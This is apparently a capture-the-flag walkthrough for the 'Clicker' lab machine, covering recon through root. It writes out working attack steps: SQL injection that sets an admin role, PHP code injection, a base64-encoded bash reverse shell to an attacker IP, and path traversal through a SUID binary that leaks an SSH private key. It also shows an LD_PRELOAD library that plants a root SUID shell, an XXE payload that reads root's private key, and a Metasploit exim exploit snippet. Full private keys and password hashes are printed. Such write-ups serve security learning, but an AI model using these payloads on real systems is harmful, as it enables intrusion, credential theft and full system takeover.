Clicker

Recon

nmap_scan.log

Open 10.129.98.184:22
Open 10.129.98.184:80
Open 10.129.98.184:111
Open 10.129.98.184:2049
Open 10.129.98.184:35999
Open 10.129.98.184:43277
Open 10.129.98.184:46649
Open 10.129.98.184:57199
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.98.184

PORT      STATE SERVICE  REASON  VERSION
22/tcp    open  ssh      syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 89:d7:39:34:58:a0:ea:a1:db:c1:3d:14:ec:5d:5a:92 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO8nDXVOrF/vxCNHYMVULY8wShEwVH5Hy3Bs9s9o/WCwsV52AV5K8pMvcQ9E7JzxrXkUOgIV4I+8hI0iNLGXTVY=
|   256 b4:da:8d:af:65:9c:bb:f0:71:d5:13:50:ed:d8:11:30 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAjDCjag/Rh72Z4zXCLADSXbGjSPTH8LtkbgATATvbzv
80/tcp    open  http     syn-ack Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Did not follow redirect to http://clicker.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
111/tcp   open  rpcbind  syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      33253/tcp6  mountd
|   100005  1,2,3      46179/udp   mountd
|   100005  1,2,3      57199/tcp   mountd
|   100005  1,2,3      59152/udp6  mountd
|   100021  1,3,4      44929/tcp6  nlockmgr
|   100021  1,3,4      45075/udp   nlockmgr
|   100021  1,3,4      46649/tcp   nlockmgr
|   100021  1,3,4      47592/udp6  nlockmgr
|   100024  1          35999/tcp   status
|   100024  1          38005/udp   status
|   100024  1          44633/tcp6  status
|   100024  1          58652/udp6  status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
2049/tcp  open  nfs      syn-ack 3-4 (RPC #100003)
35999/tcp open  status   syn-ack 1 (RPC #100024)
43277/tcp open  mountd   syn-ack 1-3 (RPC #100005)
46649/tcp open  nlockmgr syn-ack 1-4 (RPC #100021)
57199/tcp open  mountd   syn-ack 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80) (Enum)

We are able to register, then login, then play some clicker and lastly save our progress. Level up function doesn't trigger any kind of request, so it can be modified anytime I think.

NFS

https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting

└─$ showmount -e clicker.htb
Export list for clicker.htb:
/mnt/backups *
└─$ sudo mount -t nfs -o nolock clicker.htb:/mnt/backups /mnt/tmpmount
└─$ ls -alh /mnt/tmpmount
Permissions Size User Date Modified Name
.rw-r--r--@ 2.3M root  1 Sep  2023   clicker.htb_backup.zip
└─$ install -m 666 /mnt/tmpmount/clicker.htb_backup.zip .
└─$ unzip clicker.htb_backup.zip
└─$ sudo umount /mnt/tmpmount

The backup contains website source code and there seems to be SQLi in the get_top_players, because all other queries use prepared statements.

I had sqlmap in the background and SQLi might be possible in other places with level as it seems.

└─$ sqlmap -u 'http://clicker.htb/save_game.php?clicks=13&level=2' --batch --cookie 'PHPSESSID=f0oqkvrp8rj92vj6cm7nsg5idp' --dbms=MySQL --level 5 --risk 3 --threads 9

HTTP (80)

Source Analysis

First we need to become admin to access the other endpoints. Registration doesn't allow special characters in username, it shouldn't exist otherwise we are good to go.

<?php
session_start();
include_once("db_utils.php");

if (isset($_POST['username']) && isset($_POST['password']) && $_POST['username'] != "" && $_POST['password'] != "") {
	if (! ctype_alnum($_POST["username"])) {
		header('Location: /register.php?err=Special characters are not allowed');
	}
	elseif(check_exists($_POST['username'])) {
		header('Location: /register.php?err=User already exists');
	}
	else {
		create_new_player($_POST['username'], $_POST['password']);
		header('Location: /index.php?msg=Successfully registered');
	}
}
?>

Diagnostics is access with token, we have it in hashed format but md5hashing or crackstation was not successful.

<?php
if (isset($_GET["token"])) {
    if (strcmp(md5($_GET["token"]), "ac0e5a6a3a50b5639e69ae6d8cd49f40") != 0) {
        header("HTTP/1.1 401 Unauthorized"); exit;
    }
} else {
    header("HTTP/1.1 401 Unauthorized"); die;
}

function array_to_xml($data, &$xml_data) {
    foreach ($data as $key => $value) {
        if (is_array($value)) {
            if (is_numeric($key)) { $key = 'item' . $key; }
            $subnode = $xml_data->addChild($key);
            array_to_xml($value, $subnode);
        } else {
            $xml_data->addChild("$key", htmlspecialchars("$value"));
        }
    }
}

$db_server = "localhost";
$db_username = "clicker_db_user";
$db_password = "clicker_db_password";
$db_name = "clicker";

$connection_test = "OK";

try {
    $pdo = new PDO("mysql:dbname=$db_name;host=$db_server", $db_username, $db_password, array(PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION));
} catch (PDOException $ex) {
    $connection_test = "KO";
}
$data = [];
$data["timestamp"] = time();
$data["date"] = date("Y/m/d h:i:sa");
$data["php-version"] = phpversion();
$data["test-connection-db"] = $connection_test;
$data["memory-usage"] = memory_get_usage();
$env = getenv();
$data["environment"] = $env;

$xml_data = new SimpleXMLElement('<?xml version="1.0"?><data></data>');
array_to_xml($data, $xml_data);
$result = $xml_data->asXML();
print $result;

In db_utils save_profle functions looks funky.

function save_profile($player, $args) {
	global $pdo;
  	$params = ["player"=>$player];
	$setStr = "";
  	foreach ($args as $key => $value) {
    		$setStr .= $key . "=" . $pdo->quote($value) . ",";
	}
  	$setStr = rtrim($setStr, ",");
  	$stmt = $pdo->prepare("UPDATE players SET $setStr WHERE username = :player");
  	$stmt -> execute($params);
}

It's used in save_game

<?php
session_start();
include_once("db_utils.php");

if (isset($_SESSION['PLAYER']) && $_SESSION['PLAYER'] != "") {
	$args = [];
	foreach($_GET as $key=>$value) {
		if (strtolower($key) === 'role') {
			// prevent malicious users to modify role
			header('Location: /index.php?err=Malicious activity detected!');
			die;
		}
		$args[$key] = $value;
	}
	save_profile($_SESSION['PLAYER'], $_GET);
	// update session info
	$_SESSION['CLICKS'] = $_GET['clicks'];
	$_SESSION['LEVEL'] = $_GET['level'];
	header('Location: /index.php?msg=Game has been saved!');
}
?>

SQLi

The code is never checking if role could be inside value, hence we can inject role from there and get proper SQL query.

Actually we need to be inside key, because value get's quoted and can't be used.

└─$ curl "http://clicker.htb/save_game.php?clicks=13&role%3d0x41646d696e,level=3" -b 'PHPSESSID=f0oqkvrp8rj92vj6cm7nsg5idp'

The odd thing is permission assignment in authenticate.php is that it only gives permissions whenever you login, so right now live query update will not be seen and we are still User. Log out and in to refresh permissions.

Administrator

└─$ curl http://clicker.htb/exports/top_players_29dpvend.txt
Nickname: y Clicks: 13 Level: 3
Nickname: admin Clicks: 999999999999999999 Level: 999999999
Nickname: ButtonLover99 Clicks: 10000000 Level: 100
Nickname: Paol Clicks: 2776354 Level: 75
Nickname: Th3Br0 Clicks: 87947322 Level: 1

export.php doesn't check for invalid formats, so we can request to save PHP. If not txt or json, then it's HTML which is what PHP needs. We can see it displaying nickname, clicks, level. We registered with username, but nickname is something new and there's also no restriction on it.

  $s .= '    <th scope="row">' . $currentplayer["nickname"] . '</th>';
  $s .= '    <td>' . $currentplayer["clicks"] . '</td>';
  $s .= '    <td>' . $currentplayer["level"] . '</td>';
  $s .= '  </tr>';

└─$ curl "http://clicker.htb/save_game.php?clicks=13&role%3d0x41646d696e,level=3&nickname=<%3fphp+echo+phpinfo()%3b+%3f>" -b 'PHPSESSID=f0oqkvrp8rj92vj6cm7nsg5idp'

It works

Get reverse shell

└─$ curl "http://clicker.htb/save_game.php?clicks=13&role%3d0x41646d696e,level=3&nickname=<%3fphp+system('echo+L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk5LzQ0NDQgMD4mMQ%3d%3d|base64+-d|bash')+%3f>" -b 'PHPSESSID=f0oqkvrp8rj92vj6cm7nsg5idp'
└─$ curl 'http://clicker.htb/export.php' -b 'PHPSESSID=f0oqkvrp8rj92vj6cm7nsg5idp' -d 'threshold=1000000&extension=php' -is | grep Location
Location: /admin.php?msg=Data has been saved in exports/top_players_qcrf3d8h.php
└─$ curl 'http://clicker.htb/exports/top_players_qcrf3d8h.php'
---
└─$ pwncat -lp 4444
[12:22:13] Welcome to pwncat 🐈!                                                         __main__.py:164
[12:22:19] received connection from 10.129.98.184:49412                                       bind.py:84
[12:22:22] 10.129.98.184:49412: registered new host w/ db                                 manager.py:957
(local) pwncat$
(remote) www-data@clicker:/var/www/clicker.htb/exports$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse Shell (www-data)

Enumerate the database with credentials from source code.

(remote) www-data@clicker:/var/www/clicker.htb$ mysql -u 'clicker_db_user' -p'clicker_db_password' -e 'SHOW DATABASES;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+--------------------+
| Database           |
+--------------------+
| clicker            |
| information_schema |
| performance_schema |
+--------------------+
(remote) www-data@clicker:/var/www/clicker.htb$ mysql -u 'clicker_db_user' -p'clicker_db_password' clicker -e 'SHOW TABLES;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+-------------------+
| Tables_in_clicker |
+-------------------+
| players           |
+-------------------+
(remote) www-data@clicker:/var/www/clicker.htb$ mysql -u 'clicker_db_user' -p'clicker_db_password' clicker -e 'SELECT username,password FROM players;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+---------------+------------------------------------------------------------------+
| username      | password                                                         |
+---------------+------------------------------------------------------------------+
| admin         | ec9407f758dbed2ac510cac18f67056de100b1890f5bd8027ee496cc250e3f82 |
| ButtonLover99 | 55d1d58e17361fe78a61a96847b0e0226a0bc1a4e38a7b167c10b5cf513ca81f |
| Paol          | bff439c136463a07dac48e50b31a322a4538d1fac26bfb5fd3c48f57a17dabd3 |
| Th3Br0        | 3185684ff9fd84f65a6c3037c3214ff4ebdd0e205b6acea97136d23407940c01 |
| x             | 2d711642b726b04401627ca9fbac32f5c8530fb1903cc4db02258717921a4881 |
+---------------+------------------------------------------------------------------+

No hits with hashes.

Since Im on pwncat-cs I can use enumerate command, SUID programs caught my eye.

(local) pwncat$ run enumerate
file.suid facts
  - /usr/bin/sudo owned by root
  - /usr/bin/chsh owned by root
  - /usr/bin/gpasswd owned by root
  - /usr/bin/fusermount3 owned by root
  - /usr/bin/su owned by root
  - /usr/bin/umount owned by root
  - /usr/bin/newgrp owned by root
  - /usr/bin/chfn owned by root
  - /usr/bin/passwd owned by root
  - /usr/bin/mount owned by root
  - /usr/lib/openssh/ssh-keysign owned by root
  - /usr/lib/dbus-1.0/dbus-daemon-launch-helper owned by root
  - /usr/libexec/polkit-agent-helper-1 owned by root
  - /usr/sbin/mount.nfs owned by root
  - /opt/manage/execute_query owned by jack
...

Note: To enumerate for SUID programs just find / -perm -4000 2>/dev/null

(remote) www-data@clicker:/var/www/html$ file /opt/manage/execute_query
/opt/manage/execute_query: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=cad57695aba64e8b4f4274878882ead34f2b2d57, for GNU/Linux 3.2.0, not stripped
(remote) www-data@clicker:/var/www/html$ strings /opt/manage/execute_query
/lib64/ld-linux-x86-64.so.2
...
/home/jaH
ck/queriH
/usr/binH
/mysql -H
u clickeH
r_db_useH
r --passH
word='clH
icker_dbH
_passworH
d' clickH
...
(remote) www-data@clicker:/var/www/html$ strings /opt/manage/execute_query -eS | grep pass
H/usr/binH/mysql -HEHUHu clickeHr_db_useHEHUHr --passHword='clHEHUHicker_dbH_passworHEHUHd' clickHer -v < HEHUE
reset_password.sql

I wasn't make sense of it, but it's probably running mysql with some external scripts. Ghidra will know more, or just dogbolt because binary is really small.

int __fastcall main(int argc, const char **argv, const char **envp) {
  int result; // eax
  size_t v4; // rbx
  size_t v5; // rax
  size_t src_len; // rbx
  size_t dest_len; // rax
  int v8; // [rsp+10h] [rbp-B0h]
  char *dest; // [rsp+18h] [rbp-A8h]
  char *name; // [rsp+20h] [rbp-A0h]
  char *command; // [rsp+28h] [rbp-98h]
  char jack_queries[32]; // [rsp+30h] [rbp-90h] BYREF
  char src[88]; // [rsp+50h] [rbp-70h] BYREF
  unsigned __int64 v14; // [rsp+A8h] [rbp-18h]

  v14 = __readfsqword(0x28u);
  if ( argc > 1 ) {
    v8 = atoi(argv[1]);
    dest = (char *)calloc(20, 1);
    switch ( v8 ) {
      case 0:  puts("ERROR: Invalid arguments"); return 2;
      case 1:  strncpy(dest, "create.sql", 20); goto LABEL_10;
      case 2:  strncpy(dest, "populate.sql", 20); goto LABEL_10;
      case 3:  strncpy(dest, "reset_password.sql", 20); goto LABEL_10;
      case 4:  strncpy(dest, "clean.sql", 20); goto LABEL_10;
      default: strncpy(dest, argv[2], 20);
LABEL_10:
        strcpy(jack_queries, "/home/jack/queries/");
        v4 = strlen(jack_queries);
        v5 = strlen(dest);
        name = (char *)calloc(v4 + v5 + 1, 1);
        strcat(name, jack_queries);
        strcat(name, dest);
        setreuid(1000, 1000);
        if ( access(name, 4) ) {
          puts("File not readable or not found");
        }
        else {
          strcpy(src, "/usr/bin/mysql -u clicker_db_user --password='clicker_db_password' clicker -v < ");
          src_len = strlen(src);
          dest_len = strlen(dest);
          command = (char *)calloc(src_len + dest_len + 1, 1);
          strcat(command, src);
          strcat(command, name);
          system(command);
        }
        result = 0;
        break;
    }
  }
  else {
    puts("ERROR: not enough arguments"); return 1;
  }
  return result;
}

The binary also has a README

(remote) www-data@clicker:/opt/manage$ cat README.txt
Web application Management

Use the binary to execute the following task:
        - 1: Creates the database structure and adds user admin
        - 2: Creates fake players (better not tell anyone)
        - 3: Resets the admin password
        - 4: Deletes all users except the admin

But there's a 5th option, which is to use other *.sql files as long as we don't provide first argument in range of 0-4 and then second argument file we want to read.

(remote) www-data@clicker:/opt/manage$ /opt/manage/execute_query 5 ../../../etc/passwd | grep sh$
mysql: [Warning] Using a password on the command line interface can be insecure.
root:x:0:0:root:/root:/bin/bash
jack:x:1000:1000:jack:/home/jack:/bin/bash
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
' at line 1

For some reason /etc/hostname isn't readable

(remote) www-data@clicker:/opt/manage$ ls -alh /etc/hostname
-rw-r--r-- 1 root adm 8 Feb 25  2023 /etc/hostname
(remote) www-data@clicker:/opt/manage$ ls -alh /etc/passwd
-rw-r--r-- 1 root root 2.0K Sep  5  2023 /etc/passwd

There's max length limit somewhere, but basically

Works       -> /opt/manage/execute_query 5 ../../../etc/passwd
Doesnt Work -> /opt/manage/execute_query 5 ../../../etc/passw

(remote) www-data@clicker:/opt/manage$ /opt/manage/execute_query 5 ../../../home/jack/.ssh/id_rsa
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR: Cant initialize batch_readline - may be the input source is a directory or a block device.
(remote) www-data@clicker:/opt/manage$ /opt/manage/execute_query 5 ../.ssh/id_rsa
mysql: [Warning] Using a password on the command line interface can be insecure.
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAs4eQaWHe45iGSieDHbraAYgQdMwlMGPt50KmMUAvWgAV2zlP8/1Y
J/tSzgoR9Fko8I1UpLnHCLz2Ezsb/MrLCe8nG5TlbJrrQ4HcqnS4TKN7DZ7XW0bup3ayy1
kAAZ9Uot6ep/ekM8E+7/39VZ5fe1FwZj4iRKI+g/BVQFclsgK02B594GkOz33P/Zzte2jV
Tgmy3+htPE5My31i2lXh6XWfepiBOjG+mQDg2OySAphbO1SbMisowP1aSexKMh7Ir6IlPu
nuw3l/luyvRGDN8fyumTeIXVAdPfOqMqTOVECo7hAoY+uYWKfiHxOX4fo+/fNwdcfctBUm
pr5Nxx0GCH1wLnHsbx+/oBkPzxuzd+BcGNZp7FP8cn+dEFz2ty8Ls0Mr+XW5ofivEwr3+e
30OgtpL6QhO2eLiZVrIXOHiPzW49emv4xhuoPF3E/5CA6akeQbbGAppTi+EBG9Lhr04c9E
2uCSLPiZqHiViArcUbbXxWMX2NPSJzDsQ4xeYqFtAAAFiO2Fee3thXntAAAAB3NzaC1yc2
EAAAGBALOHkGlh3uOYhkongx262gGIEHTMJTBj7edCpjFAL1oAFds5T/P9WCf7Us4KEfRZ
KPCNVKS5xwi89hM7G/zKywnvJxuU5Wya60OB3Kp0uEyjew2e11tG7qd2sstZAAGfVKLenq
f3pDPBPu/9/VWeX3tRcGY+IkSiPoPwVUBXJbICtNgefeBpDs99z/2c7Xto1U4Jst/obTxO
TMt9YtpV4el1n3qYgToxvpkA4NjskgKYWztUmzIrKMD9WknsSjIeyK+iJT7p7sN5f5bsr0
RgzfH8rpk3iF1QHT3zqjKkzlRAqO4QKGPrmFin4h8Tl+H6Pv3zcHXH3LQVJqa+TccdBgh9
cC5x7G8fv6AZD88bs3fgXBjWaexT/HJ/nRBc9rcvC7NDK/l1uaH4rxMK9/nt9DoLaS+kIT
tni4mVayFzh4j81uPXpr+MYbqDxdxP+QgOmpHkG2xgKaU4vhARvS4a9OHPRNrgkiz4mah4
lYgK3FG218VjF9jT0icw7EOMXmKhbQAAAAMBAAEAAAGACLYPP83L7uc7vOVl609hvKlJgy
FUvKBcrtgBEGq44XkXlmeVhZVJbcc4IV9Dt8OLxQBWlxecnMPufMhld0Kvz2+XSjNTXo21
1LS8bFj1iGJ2WhbXBErQ0bdkvZE3+twsUyrSL/xIL2q1DxgX7sucfnNZLNze9M2akvRabq
DL53NSKxpvqS/v1AmaygePTmmrz/mQgGTayA5Uk5sl7Mo2CAn5Dw3PV2+KfAoa3uu7ufyC
kMJuNWT6uUKR2vxoLT5pEZKlg8Qmw2HHZxa6wUlpTSRMgO+R+xEQsemUFy0vCh4TyezD3i
SlyE8yMm8gdIgYJB+FP5m4eUyGTjTE4+lhXOKgEGPcw9+MK7Li05Kbgsv/ZwuLiI8UNAhc
9vgmEfs/hoiZPX6fpG+u4L82oKJuIbxF/I2Q2YBNIP9O9qVLdxUniEUCNl3BOAk/8H6usN
9pLG5kIalMYSl6lMnfethUiUrTZzATPYT1xZzQCdJ+qagLrl7O33aez3B/OAUrYmsBAAAA
wQDB7xyKB85+On0U9Qk1jS85dNaEeSBGb7Yp4e/oQGiHquN/xBgaZzYTEO7WQtrfmZMM4s
SXT5qO0J8TBwjmkuzit3/BjrdOAs8n2Lq8J0sPcltsMnoJuZ3Svqclqi8WuttSgKPyhC4s
FQsp6ggRGCP64C8N854//KuxhTh5UXHmD7+teKGdbi9MjfDygwk+gQ33YIr2KczVgdltwW
EhA8zfl5uimjsT31lks3jwk/I8CupZGrVvXmyEzBYZBegl3W4AAADBAO19sPL8ZYYo1n2j
rghoSkgwA8kZJRy6BIyRFRUODsYBlK0ItFnriPgWSE2b3iHo7cuujCDju0yIIfF2QG87Hh
zXj1wghocEMzZ3ELIlkIDY8BtrewjC3CFyeIY3XKCY5AgzE2ygRGvEL+YFLezLqhJseV8j
3kOhQ3D6boridyK3T66YGzJsdpEvWTpbvve3FM5pIWmA5LUXyihP2F7fs2E5aDBUuLJeyi
F0YCoftLetCA/kiVtqlT0trgO8Yh+78QAAAMEAwYV0GjQs3AYNLMGccWlVFoLLPKGItynr
Xxa/j3qOBZ+HiMsXtZdpdrV26N43CmiHRue4SWG1m/Vh3zezxNymsQrp6sv96vsFjM7gAI
JJK+Ds3zu2NNNmQ82gPwc/wNM3TatS/Oe4loqHg3nDn5CEbPtgc8wkxheKARAz0SbztcJC
LsOxRu230Ti7tRBOtV153KHlE4Bu7G/d028dbQhtfMXJLu96W1l3Fr98pDxDSFnig2HMIi
lL4gSjpD/FjWk9AAAADGphY2tAY2xpY2tlcgECAwQFBg==
-----END OPENSSH PRIVATE KEY-----

SSH (22)

└─$ vi jack.id_rsa
└─$ chmod 600 jack.id_rsa
└─$ ssh jack@clicker.htb -i jack.id_rsa
jack@clicker:~$ id
uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev)

User.txt

673d78af060124a0493697dc465de0f3

Privilege Escalation

jack@clicker:~$ sudo -l
Matching Defaults entries for jack on clicker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jack may run the following commands on clicker:
    (ALL : ALL) ALL
    (root) SETENV: NOPASSWD: /opt/monitor.sh

jack@clicker:~$ cat /opt/monitor.sh
#!/bin/bash
if [ "$EUID" -ne 0 ]
  then echo "Error, please run as root"
  exit
fi

set PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
unset PERL5LIB;
unset PERLLIB;

data=$(/usr/bin/curl -s http://clicker.htb/diagnostic.php?token=secret_diagnostic_token);
/usr/bin/xml_pp <<< $data;
if [[ $NOSAVE == "true" ]]; then
    exit;
else
    timestamp=$(/usr/bin/date +%s)
    /usr/bin/echo $data > /root/diagnostic_files/diagnostic_${timestamp}.xml
fi

diagnostic.php returns:

<?xml version="1.0"?>
<data>
    <timestamp>1732990820</timestamp>
    <date>2024/11/30 06:20:20pm</date>
    <php-version>8.1.2-1ubuntu2.14</php-version>
    <test-connection-db>OK</test-connection-db>
    <memory-usage>393592</memory-usage>
    <environment>
        <APACHE_RUN_DIR>/var/run/apache2</APACHE_RUN_DIR>
        <SYSTEMD_EXEC_PID>1190</SYSTEMD_EXEC_PID>
        <APACHE_PID_FILE>/var/run/apache2/apache2.pid</APACHE_PID_FILE>
        <JOURNAL_STREAM>8:27212</JOURNAL_STREAM>
        <PATH>/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</PATH>
        <INVOCATION_ID>dacaa4cd772a4f88b3d39bd7ff54d4cd</INVOCATION_ID>
        <APACHE_LOCK_DIR>/var/lock/apache2</APACHE_LOCK_DIR>
        <LANG>C</LANG>
        <APACHE_RUN_USER>www-data</APACHE_RUN_USER>
        <APACHE_RUN_GROUP>www-data</APACHE_RUN_GROUP>
        <APACHE_LOG_DIR>/var/log/apache2</APACHE_LOG_DIR>
        <PWD>/</PWD>
    </environment>
</data>

xml_pp - xml pretty-printer

Path 1

Sudo resets env for every binary env_reset, but for this shell script we have SETENV meaning we keep the env variables when running it. One of the linux exploits is LD_PRELOAD which is used to load functions, creating malicious library is easy.

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld_preload-and-ld_library_path

└─$ nano pwn.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("install -m4777 /bin/bash /tmp/rootbash");
}
└─$ gcc -fPIC -shared -o pwn.so pwn.c -nostartfiles
└─$ scp -i jack.id_rsa pwn.so jack@clicker.htb:/tmp/pwn.so
---
jack@clicker:~$ sudo LD_PRELOAD=/tmp/pwn.so /opt/monitor.sh
jack@clicker:~$ ls /tmp/rootbash -lah
-rwsrwxrwx 1 root root 1.4M Nov 30 18:41 /tmp/rootbash
jack@clicker:~$ /tmp/rootbash -p
rootbash-5.1# id
uid=1000(jack) gid=1000(jack) euid=0(root) groups=1000(jack),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev)

Path 2

Shellscript uses curl to download the data from webserver, curl has special env variable called HTTP_PROXY which just adds proxy to command. We can become proxy, edit response and essentially acting as MiTM.

For burp to catch requests make sure to include tun0 in interfaces.

jack@clicker:~$ sudo http_proxy="http://10.10.14.99:8080" /opt/monitor.sh
---
Do Intercept > Request
---
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM "/root/.ssh/id_rsa"> ]>
<data>&example;</data>
---
<!DOCTYPE foo [
<!ENTITY example SYSTEM "/root/.ssh/id_rsa">
]>
<!--?xml version="1.0" ?--><data>-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
</data>

Path 3

Exim - 'perl_startup' Local Privilege Escalation (Metasploit)

  def exploit(c = payload.encoded)
    # PERL5DB technique from http://perldoc.perl.org/perlrun.html
    cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "#{c}"' exim -ps 2>&-})
  end

